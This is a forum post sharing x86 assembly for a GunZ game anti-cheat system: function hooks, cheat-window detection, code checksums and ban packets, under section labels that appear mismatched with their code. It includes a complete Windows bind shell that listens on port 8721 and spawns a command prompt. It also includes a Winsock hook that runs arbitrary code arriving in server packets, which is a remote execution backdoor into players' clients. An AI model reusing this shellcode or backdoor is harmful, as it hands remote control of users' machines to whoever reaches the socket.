Auto banned System and some Other asm functions
Hello Every one
AutoBanPostSkill
AutoBanMPCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb ; death glitch mov ebx, [ebp+ (DeathGlitchPatchAddress - start)] push ebp push 0x40 push 6 push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov [ebx], DWORD 0x90909090 mov [ebx], WORD 0x9090 popad mov al,1 retn PatchLocation: dd 0x47dda0 GetCurrentThreadIdAddress: dd 0x5e6120 VirtualProtectAddress: dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xffffffb0 PacketAnswer: dd 0x12345678 PacketEnd: DeathGlitchPatchAddress: dd 0x4B2EC9 CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump push ebp call .nextline6 .nextline6: pop eax sub eax, .nextline6 - start mov ebp, eax mov eax, [EBP + ( GetCurrentThreadIdAddress - start ) ] call [eax] ; load thread id into eax cmp DWORD [EBP + ( PacketAnswer - start )], 0x12345678 ; test if already set jne .compareAnswer ; already set, jump to compare thread ids mov [ebp + ( PacketAnswer - start) ], eax ; wasn't set, so its now set .compareAnswer: cmp [ebp + ( PacketAnswer - start) ], eax ; compare thread ids pop ebp jne SHORT .deathjump ; if the threads aren't equal, bail mov eax, [fs:0] push -1 mov eax, 0x47dda8 ; return jmp JMP eax .deathjump: pushad ;== all pushed call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, [EBP + ( GetCurrentThreadIdAddress - start ) ] call [eax] mov [ ebp + ( PacketAnswer - start ) ], eax mov eax, [esp + 8] mov [ebp + PacketAnswer], eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] ; == all reset popad ;; push -1 // never fixed? Copied from another anti hack probably ;; push 0x0056792d ;; mov eax, 0x448e35 ;; jmp eax push -1 mov eax, 0x47dda8 ; return jmp JMP eax RETN PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
basedetectionCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x448e30 VirtualProtectAddress dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xffffffff PacketAnswer: dd 0x00000000 PacketEnd: CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump PUSH -1 ; bytes we stole, execute them now... PUSH 0x005D792D mov eax, 0x448e35 ; return jmp JMP eax .deathjump: pushad call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] popad push -1 push 0x0056792d mov eax, 0x448e35 jmp eax RETN PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
bindshellCode:bits 32 %define SOCKET %define HOOK startOfBaseShell: pushad call .jumpTrick .jumpTrick: pop ebp sub ebp, .jumpTrick ; edx: patch location ; ebx: new location lea esi, [ebp + HookTableStart - startOfBaseShell] lea edi, [ebp + GunZFunctionLocations - startOfBaseShell] xor ecx, ecx .loaderLoop: mov ebx, dword [esi + ecx * 4] cmp ebx, 0 je .doneLoading add ebx, ebp mov edx, dword [edi + ecx * 4] call installHook xchg ebx, edx call sendHookInstalled add ecx, 1 jmp .loaderLoop .doneLoading: popad mov al, 1 retn HookTableStart: dd hookZPostSkill - startOfBaseShell dd hookZPostShot - startOfBaseShell dd hookZPostShotSP - startOfBaseShell dd hookZPostShotMelee - startOfBaseShell dd hookZChatOutput - startOfBaseShell dd hookZPostStageStart - startOfBaseShell dd hookZPostRequestSpawnWorldItem - startOfBaseShell dd hookZPostQuestRequestNPCDead - startOfBaseShell dd hookZPostChannelChat - startOfBaseShell dd hookZGetCharacterManager - startOfBaseShell dd hookZPostGameKill - startOfBaseShell dd hookZCharacterSetHP - startOfBaseShell dd 0 GunZFunctionLocations: ZPostSkill: dd 0x0047DDA0 ZPostShot: dd 0x0047DF30 ZPostShotSP: dd 0x00475C80 ZPostShotMelee: dd 0x0047E020 ZChatOutput: dd 0x0042A230 ZPostStageStart: dd 0x00448E30 ZPostRequestSpawnWorldItem: dd 0x004B4640 ZPostQuestRequestNPCDead: dd 0x0048A9E0 ZPostChannelChat: dd 0x004298D0 ZGetCharacterManager: dd 0x0049E870 ZPostGameKill: dd 0x004A07E0 ZCharacterSetHP: dd 0x00485D50 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostSkill: ; since there was a call, the return address is on the stack, load it to eax pop eax push eax ; if the caller was not in main gunz memory, it was called from a loaded dll, and probably a hack cmp eax, 0x0645000 jge short .detectedHacking ; original programs instructions we overwrote .originalInstructions: push ebx mov ebx, 0x0047DDA0 call checkCallingThread pop ebx mov eax, dword [fs:0] push -1 push 0x0047DDA8 retn .detectedHacking: mov eax, 0x0047DDA0 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostShotMelee: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x0047E020 call checkCallingThread pop ebx mov eax, dword [fs:0] push -1 push 0x0047E028 retn .detectedHacking: mov eax, 0x0047E020 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostShot: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x0047DF30 call checkCallingThread pop ebx PUSH -1 PUSH 0x005D913B MOV EAX,DWORD [FS:0] push 0x0047DF3D retn .detectedHacking: mov eax, 0x0047DF30 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostShotSP: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x00475C80 call checkCallingThread pop ebx MOV EAX,DWORD [FS:0] PUSH -1 push 0x00475C88 retn .detectedHacking: mov eax, 0x00475C80 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZChatOutput: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x0042a230 call checkCallingThread pop ebx mov eax, 0x4abce0 call eax mov ecx, dword [esp+10] push 0x0042a239 retn .detectedHacking: mov eax, 0x0042a230 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostStageStart: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x00448E30 call checkCallingThread pop ebx push -1 push 0x5d792d mov eax, dword [fs:0] push 0x00448E3D retn .detectedHacking: mov eax, 0x00448E30 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostRequestSpawnWorldItem: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x004B4640 call checkCallingThread pop ebx mov eax, dword [fs:0] push -1 push 0x004B4648 retn .detectedHacking: mov eax, 0x004B4640 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostQuestRequestNPCDead: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x0048A9E0 call checkCallingThread pop ebx push -1 push 0x005d950d mov eax, dword [fs:0] push 0x0048A9ED retn .detectedHacking: mov eax, 0x0048A9E0 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostChannelChat: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x004298D0 call checkCallingThread pop ebx push -1 push 0x5d6989 mov eax, dword [fs:0] push 0x004298DD retn .detectedHacking: mov eax, 0x004298D0 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZGetCharacterManager: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x0049E870 call checkCallingThread pop ebx mov eax, dword [0x672f68] test eax,eax jnz .return2 .return1: retn .return2: add eax, 0x54 retn .detectedHacking: mov eax, 0x0049E870 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZPostGameKill: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x004A07E0 call checkCallingThread pop ebx push -1 push 0x5da14f mov eax, dword [fs:0] push 0x4a07ed .detectedHacking: mov eax, 0x004A07E0 call reportHacking jmp short .originalInstructions retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; hookZCharacterSetHP: pop eax push eax cmp eax, 0x645000 jge .detectedHacking .originalInstructions: push ebx mov ebx, 0x00485D50 call checkCallingThread pop ebx mov eax, [esp+4] push esi mov esi, ecx xor ecx,ecx push 0x485d59 .detectedHacking: mov eax, 0x00485D50 call reportHacking jmp short .originalInstructions retn reportHacking: pushad call .reportHackingJumpTrick .reportHackingJumpTrick: pop ebp sub ebp, .reportHackingJumpTrick - startOfBaseShell ; edx packet id ; ebx packet data ; ecx packet data length mov [ebp + hackDetectionIdentifier - startOfBaseShell] , eax lea ebx, [ebp+hackDetectionIdentifier-startOfBaseShell] mov edx, 0x10000003 mov ecx, 4 call gunzSendPacket popad retn hackDetectionIdentifier: dd 0x0 %include "gunzFunctionAddresses.asm" %include "gunzHookFunctions.asm"
EnumWindowsDetectionCode:[BITS 32] global _start _start: LCaller: call LLoadFunctions LDataSegment: ;======================== dd "CMD" dd 0x79c679e7 ; closesocket 12 dd 0x498649e5 ; accept 16 dd 0xe92eada4 ; listen 20 dd 0xc7701aa4 ; bind 24 dd 0xadf509d9 ; WSASocketA 28 dd 0x3bfcedcb ; WSAStartup 32 dd 0xec0e4e8e ; LoadLibraryA 36 dd 0x73e2d87e ; ExitProcess 40 dd 0xce05d9ad ; WaitForSingleObject 44 dd 0x16b3fe72 ; CreateProcessA 48 db "WS2_32.DLL", 0x00, 0x01 ;======================== LLoadFunctions: pop ebx push esp mov ebp, esp mov [ebp], ebx LKernel32Base: push byte 0x30 pop ecx mov eax, [fs:ecx] mov eax, [eax + 0x0c] mov esi, [eax + 0x1c] lodsd mov ebx, [eax + 0x08] jmp short LStartLoading LLoadWinsock: lea edx, [edi + 44] ; get address of ws2_32.dll push ecx ; save counter push edx ; push address of ws2_32.dll call eax ; LoadLibraryA() mov ebx, eax ; save module handle pop ecx ; restore counter jmp short Looper2 LStartLoading: ; Start loading addresses at ebp + 12 push byte 0x08 pop esi add esi, ebp ; Function counter push byte 0x0a pop ecx mov edi, [ebp] Looper: cmp cl, 0x06 je short LLoadWinsock Looper2: push ecx ; save the counter push ebx ; dll handle push dword [edi + ecx*4] ; function hash value call LGetProcAddress ; find the address pop ecx ; restore the counter mov [esi + ecx * 4], eax ; stack segment to store addresses loop Looper xor edi, edi LWSAStartup: ; WSAStartup(0x**** DATA) sub sp, 400 push esp push 0x101 call [ebp + 32] LWSASocketA: ; WSASocketA(2,1,0,0,0,0) push edi push edi push edi push edi inc edi push edi inc edi push edi call [ebp + 28] mov ebx, eax ; save socket to ebx xor edi, edi LBind: push edi push edi push dword 0x11220002 ; port 8721 mov esi, esp push byte 0x10 ; length push esi push ebx call [ebp + 24] LListen: push edi push ebx call [ebp + 20] LAccept: push edi push esi push ebx call [ebp + 16] mov edx, eax LCreateProcessStructs: ; allocate space for STARTUPINFO, PROCESS_INFORMATION sub sp, 0x54 ; zero out SI/PI lea edi, [esp] xor eax, eax push byte 21 pop ecx LBZero: rep stosd mov edi, edx mov byte [esp + 16], 68 ; si.cb = sizeof(si) inc byte [esp + 61] ; si.dwFlags = 0x100 ; socket handles mov [esp + 16 + 56], edi mov [esp + 16 + 60], edi mov [esp + 16 + 64], edi lea eax, [esp + 16] ; si push esp ; pi push eax push ecx push ecx push ecx inc ecx push ecx dec ecx push ecx push ecx push dword [ebp] push ecx LCreateProcess: call [ebp + 48] mov ecx, esp LWaitForSingleObject: push 0xFFFFFFFF push dword [ecx] call [ebp + 44] LCloseSocket: push edi call [ebp + 12] LFinished: call [ebp + 40] LGetProcAddress: push ebx push ebp push esi push edi mov ebp, [esp + 24] mov eax, [ebp + 0x3c] mov edx, [ebp + eax + 120] add edx, ebp mov ecx, [edx + 24] mov ebx, [edx + 32] add ebx, ebp LFnlp: jecxz LNtfnd dec ecx mov esi, [ebx + ecx * 4] add esi, ebp xor edi, edi cld LHshlp: xor eax, eax lodsb cmp al, ah je LFnd ror edi, 13 add edi, eax jmp short LHshlp LFnd: cmp edi, [esp + 20] jnz LFnlp mov ebx, [edx + 36] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 28] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp jmp short LDone LNtfnd: xor eax, eax LDone: mov edx, ebp pop edi pop esi pop ebp pop ebx ret 8
Patch GunzBackDoorCode:bits 32 EntryPoint: PUSHAD CALL EntryPointEBPJump EntryPointEBPJump: POP EBP SUB EBP, EntryPointEBPJump - EntryPoint PUSH 0 PUSH 0 PUSH 0 MOV EAX, EBP ADD EAX, ThreadStart - EntryPoint ; start address for thread PUSH EAX PUSH 0 PUSH 0 MOV EAX, DWORD [EBP+(CreateThreadAddress-EntryPoint)] ; create thread address CALL DWORD [EAX] ; create the thread POPAD MOV AL,1 ; return but do not delete RETN ThreadStart: CALL ThreadStartEBPJump ThreadStartEBPJump: POP EBP SUB EBP, ThreadStartEBPJump - EntryPoint ThreadLoop: PUSH 0 ; EnumWindowsParameter MOV EAX, EBP ADD EAX, EnumWindowsCallback - EntryPoint PUSH EAX ; EnumerateFunction MOV EAX, DWORD [EBP+(EnumWindowsAddress-EntryPoint)] CALL DWORD [EAX] PUSH 10000 MOV EAX, DWORD [EBP+(SleepAddress-EntryPoint)] CALL DWORD [EAX] JMP ThreadLoop - EntryPoint RETN EnumWindowsCallback: PUSHAD CALL EnumWindowsEBPJump EnumWindowsEBPJump: POP EBP SUB EBP, EnumWindowsEBPJump - EntryPoint EnumWindowsNextStringLoop: MOV EAX, DWORD [EBP+(StringTableIndex-EntryPoint)] ; Saved String Iterator INC EAX MOV DWORD [EBP+(StringTableIndex-EntryPoint)], EAX ; Saved String Iterator MOV DWORD [EBP+(PacketIdentifierIndex-EntryPoint)], EAX ; Packet with found string. SUB EAX, 1 ; Reset our index SHL EAX, 2 ; index is on dword which is multiple of 4 ADD EAX, EBP ; base of code + index table offset + offset in table == table value ADD EAX, ( StringIndexTableStart - EntryPoint ) MOV ESI, EAX CMP DWORD [ESI], 0 ; 0 means last entry JE NEAR StringComparisonDone - EntryPoint ; if we are done, bail MOV ESI, DWORD [ESI] ; read the offset ADD ESI, EBP ; MOV EAX, DWORD [ESP+0x24] ; I believe this is the window handle. PUSH 0x10 MOV EBX, EBP ADD EBX, (CompareBuffer-EntryPoint) PUSH EBX PUSH EAX MOV EAX, DWORD [EBP+(GetWindowTextAAddress-EntryPoint)] CALL DWORD [EAX] MOV EAX, EBP ADD EAX, (CompareBuffer-EntryPoint) CMP BYTE [EAX], 0 ; check end of string JE EnumWindowsNextStringLoop - EntryPoint PUSH ESI PUSH EAX CALL StubToCompareString - EntryPoint ADD ESP, 8 CMP EAX, 0 JG NEAR StringCompareHit - EntryPoint JMP EnumWindowsNextStringLoop - EntryPoint StringComparisonDone: XOR EAX, EAX MOV DWORD [EBP+(StringTableIndex-EntryPoint)], EAX POPAD MOV EAX, 1 RETN StringCompareHit: CALL SendDeathPacket - EntryPoint POPAD MOV EAX, 0 RETN SendDeathPacket: PUSHAD CALL SendDeathPacketEBPJump SendDeathPacketEBPJump: POP EAX SUB EAX, (SendDeathPacketEBPJump-EntryPoint) MOV EBP, EAX MOV EAX, DWORD [0x203E06b] ; Socket Handle PUSH 0 PUSH 0x0c MOV EBX, EBP ADD EBX, (PacketHeaderStart - EntryPoint) PUSH EBX PUSH EAX MOV EAX, DWORD [EBP+(SendPacketHookAddress-EntryPoint)] CALL DWORD [EAX] POPAD RETN StubToCompareString: MOV EAX, 0x573c80 JMP EAX DataSection: CreateThreadAddress: dd 0x5e625c EnumWindowsAddress: dd 0x5e64AC SleepAddress: dd 0x5e6110 GetWindowTextAAddress: dd 0x5e64a8 SendPacketHookAddress: dd 0x5e65c4 PacketHeaderStart: dw 0x66 dw 0x0c dd -4 PacketIdentifierIndex: dd 0 CompareBuffer: times 16 db 0 StringTableIndex: dd 0x0 StringIndexTableStart: dd String1 - EntryPoint dd String2 - EntryPoint dd String3 - EntryPoint dd String4 - EntryPoint dd 0x0 String1: db "DR Hp Help", 0 String2: db "Millenium Trai", 0 String3: db "h4c0r", 0 String4: db "Cheat Engine", 0
GetSocketHandleCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 org 0x203e000 start: MOV EAX, ESP ; get the stack pointer ADD EAX,10 ; add 10 to stack pointer PUSH EDI ; save edi MOV EDI,EAX ; pointer to stack MOV EAX,DWORD PTR DS:[EDI] ; move wants in stack to eax PUSH ECX ; save ecx ADD EAX,6 ; add 6 to what was read from stack MOV CX,WORD PTR DS:[EAX] ; read packet+6 word AND ECX,0FF ; get just the lower byte SUB ECX,2 ; subtract two from ecx ADD EAX,2 ; add two to eax MOV AX,WORD PTR DS:[EAX] ; read in opcode AND EAX,0FFFF ; just the bottom CMP EAX,0FFFF ; see if its an 0xffff JNZ SHORT quickfinish1 MOV EAX,DWORD PTR DS:[EDI] ADD EAX,0F SUB ECX,7 PUSH ECX PUSH EAX PUSH 40 PUSH 3000 PUSH ECX PUSH 0 CALL DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAlloc POP EDI POP ECX XCHG EAX,EDI PUSH EDX notdone: DEC ECX MOV EDX,DWORD PTR DS:[EAX+ECX] MOV DWORD PTR DS:[ECX+EDI],EDX JNZ SHORT notdone CALL EDI CMP AL,1 JE SHORT quickfinish2 PUSH 8000 PUSH 0 PUSH EDI CALL DWORD PTR DS:[<&KERNEL32.VirtualFre>; kernel32.VirtualFree quickfinish2: POP EDX quickfinish1: POP ECX POP EDI RETN
gunzHookFunctionsCode:; ShellCode Designed to get the socket handle used by gunz. ; bits 32 start: pushad call nextline2 nextline2: pop ebp sub ebp, nextline2 - start mov eax, 0x203e014 mov BYTE [eax], 0xff push ebp push 0x40 push 4 mov eax, [ebp+ApiToPatch] ; get the address of the bytes to change push eax mov eax, [ebp+ VirtualProtectAddress ] ; this memory is read only, we have to allowe right call [eax] ; call VirtualProtect(ex) mov eax, [ebp + ApiToPatch] ; get the location to patch mov eax, [eax] ; read its original value mov [ebp+ OriginalApiValue], eax ; save it for later use. mov eax, ebp add eax, PatchedCallToSend mov ebx, [ebp + ApiToPatch] ; get the address to patch mov [ebx], eax ; patch it popad ; restore registers xor eax, eax mov eax, 1 ; eax = 1, dont free thise code ( we need to keep our patch function in memory ) retn PatchedCallToSend: mov eax, [esp + 4] ; esp + 4 was pushed, it is socket handle mov [0x203e06b], dword eax ; save in 203e06b ( right after the FFFF Packet checking code) call nextline ; get our current location nextline: pop eax mov eax, [eax + (OriginalApiValue - nextline)] ; Function to jump to return jmp eax ; jump to it VirtualProtectAddress: dd 0x5e62f4 ApiToPatch: dd 0x5e65c4 OriginalApiValue: dd 0
gunzFunctionAddressesCode:%ifndef GUNZHOOK %define GUNZHOOK %ifdef HOOK ; ebx address ; ecx size unprotectAddress: pushad lea eax, [ebp + unprotectStorage - startOfBaseShell] push eax push 0x40 push ecx push ebx mov eax, [ebp + VirtualProtectAddress - startOfBaseShell] call [eax] popad retn ; overwrites eax ; ebx check address checkCallingThread: push ebp call .getBaseAddress .getBaseAddress: pop eax sub eax, .getBaseAddress - startOfBaseShell mov ebp, eax mov eax, [ebp + GetCurrentThreadIdAddress - startOfBaseShell] call [eax] cmp DWORD [ebp + GetCurrentThreadIdStorage], 0x12345678 jne .compareThreads mov [ebp + GetCurrentThreadIdStorage], eax .compareThreads: cmp DWORD [ebp + GetCurrentThreadIdStorage], eax je .compareReturn ; thread hacking detected pushad ; already hacking so we can use this location for storage. ; we store in it the address we were checking for the packet data mov [ebp + GetCurrentThreadIdStorage], ebx lea ebx, [ebp + GetCurrentThreadIdStorage] ; 4 bytes of packet data mov ecx, 4 ; the packet id mov edx, 0x10000002 ; send the packet call gunzSendPacket popad .compareReturn: pop ebp retn unprotectStorage: dd 0x0 ; ebx hook location ; ecx hook length sendHookInstalled: ; save flags pushad ; mov the size of the hook to eax mov eax, ecx ; add 4 to the hook size to get the packet data size add eax, 4 ; allocate a memory bluck to build our packet data in call allocateMemory ; build the packet ; eax has the memory block, move that into edi for the destination of a copy mov edi, eax ; DWORD memory hook location mov dword [edi], ebx add edi, 4 ; save the hook size push ecx ; source is the hook installation mov esi, ebx ; write the hook out rep movsb pop ecx ; sent a packet out with the hook info ; edx packet id mov edx, 0x10000000 ; ebx packet data mov ebx, eax ; ecx packet data length add ecx, 4 call gunzSendPacket call freeMemory popad retn ; edx: patch location ; ebx: new location installHook: ; save used variables pushad ; calculate distance from edx to ebx mov ecx, ebx ; ecx has location to jump to ; ebx - ecx is distance for jump sub ecx, edx ; ecx has difference from jump location to patch ; distance doesnt include the jump instruction size sub ecx, 5 ; write the jump to the template mov [ebp + ((installHookDataPatchCode-startOfBaseShell)+1)], ecx mov ecx, installHookDataPatchEnd - installHookDataPatchCode mov ebx, edx call unprotectAddress ; install the hook ; setup the source to be our calculated jump mov esi, ebp add esi, installHookDataPatchCode - startOfBaseShell ; the target mov edi, [esp + (5*4)] ; how many bytes to copy mov ecx, installHookDataPatchEnd - installHookDataPatchCode rep movsb popad retn installHookDataPatchCode: jmp 0x12345678 nop nop nop installHookDataPatchEnd: %include "gunzPacketFunctions.asm" %endif %endif
gunzPacketFunctionsCode:%ifndef GUNZFUNCS %define GUNZFUNCS VirtualProtectAddress: dd 0x5e62f4 VirtualAllocAddress: dd 0x005E62EC VirtualFreeAddress: dd 0x005E62F0 %ifdef SOCKET WinsockSendAddress: dd 0x005e65c4 %endif %ifdef THREADED CreateThreadAddress: dd 0x5e625c SetThreadPriorityAddress: dd 0x5e62b8 SleepAddress: dd 0x5e6110 %endif GunzCodeStartAddress: dd 0x005e6000 GunzCodeEndAddress: dd 0x00645000 %ifdef HOOK GetCurrentThreadIdAddress: dd 0x5e6120 GetCurrentThreadIdStorage: dd 0x12345678 %endif ; eax size allocateMemory: pushad push 0x40 push 0x3000 push eax push 0 mov eax, [ ebp + (VirtualAllocAddress - startOfBaseShell) ] call [eax] mov [esp + ( 7 * 4)], eax popad retn ; eax region freeMemory: pushad push 8000 push 0 push eax mov eax, [ebp + VirtualFreeAddress - startOfBaseShell] call [eax] popad retn %ifdef THREADED installFreeMemoryThread: pushad mov ecx, 0x10 lea esi, [ebp + threadPatch - startOfBaseShell] mov edi, 0x203e0b5 rep movsb popad retn threadPatch: db 0x68,0x00,0x80,0x00,0x00,0x6A,0x00,0x50,0xB8,0xF0,0x62,0x5E,0x00,0xFF,0x10,0xC3 exitThread: mov [esp + ( 8 * 4 )], eax pop eax popad push 0x203e0b5 retn ; eax thread start createThread: pushad push 0 push 0 push 0 push eax push 0 push 0 mov eax, [EBP + CreateThreadAddress - startOfBaseShell] call [eax] mov [esp + ( 7 * 4 )], eax popad retn ; eax handle setLowPriority: ; background worker push 0x00010000 ; handle push eax mov eax, [ebp + SetThreadPriorityAddress - startOfBaseShell] call [eax] retn %endif %endif
hashregionCode:%ifndef GUNZPACKET %define GUNZPACKET %ifdef SOCKET ; edx packet id ; ebx packet data ; ecx packet data length gunzSendPacket: pushad ; copy length of data into edx mov eax, ecx ; add 8 for header add eax, 8 ; allocate a buffer ; eax has size call allocateMemory push eax ; eax has address of new buffer ; write packet header mov word [eax], 0x66 add eax, 2 mov word [eax], cx add word [eax], 8 add eax, 2 mov dword [eax], edx add eax, 4 ; source of data is passed into us mov esi, ebx ; destination is the allocation buffer mov edi, eax ; ecx already has data length in it ; store it for after the mov instruction push ecx rep movsb ; restore counter pop ecx ; eax is pointing at the data start, sub 8 to go back to the packet start sub eax, 8 ; send flags push 0 ; size of data, packet header = 8, + length of data already in ecx add ecx, 8 push ecx sub ecx, 8 ; start of data push eax mov eax, dword [0x203e06b] push eax mov eax, [ebp + WinsockSendAddress - startOfBaseShell] ; int 3 call [eax] ; retrieve allocated buffer pop eax ; eax has memory region call freeMemory popad retn %include "gunzFunctionAddresses.asm" %endif %endif
Code:%define THREADED %define SOCKET bits 32 ; startup startOfBaseShell: ; save our stack pushad ; get the base pointer call jumpTrick jumpTrick: pop ebp sub ebp, jumpTrick ; create a block of code outside our memory region to free our memory when our thread is finished call installFreeMemoryThread ; create a thread so we can do work and not interfere with gunz lea eax, [ ebp + startOfThreadFunction - startOfBaseShell] call createThread call setLowPriority ; restore the stack popad ; set to 1, dont erase. make sure to call exitThread mov al, 1 retn startOfThreadFunction: ; save registers pushad ; get base pointer call getEbpThreaded getEbpThreaded: pop eax sub eax, getEbpThreaded - startOfBaseShell mov ebp, eax ; setup the hasher inputs mov esi, [ebp + hashRegionStart - startOfBaseShell] mov edi, [ebp + hashRegionEnd - startOfBaseShell] mov eax, [ebp + hashSeed - startOfBaseShell] ; hashing loop hashingStart: cmp esi, edi jge hashingFinished mov ebx, [esi] xor eax, ebx mov ecx, ebx shl ebx, 15 shr ecx, 17 or ebx, ecx add eax, ebx add esi, 4 jmp hashingStart hashingFinished: ; save checksum to memory mov [ebp + finishedChecksum - startOfBaseShell], eax ; report back to server. 0x10000001 is report checksum mov edx, 0x10000001 ; ptr to memory of packet data buffer, in our case the checksum lea ebx, [ebp + finishedChecksum - startOfBaseShell] ; size of data returned mov ecx, 4 call gunzSendPacket ; restore registers to thread creation state mov [ esp + ( 7 * 4 ) ] , ebp ; delete our memory and exit call exitThread %include "gunzFunctionAddresses.asm" %include "gunzPacketFunctions.asm" finishedChecksum: dd 0x00000000 dataSection: hashSeed: dd 0x11111111 hashRegionStart: dd 0x22222222 hashRegionEnd: dd 0x33333333
HookTemplateLoader
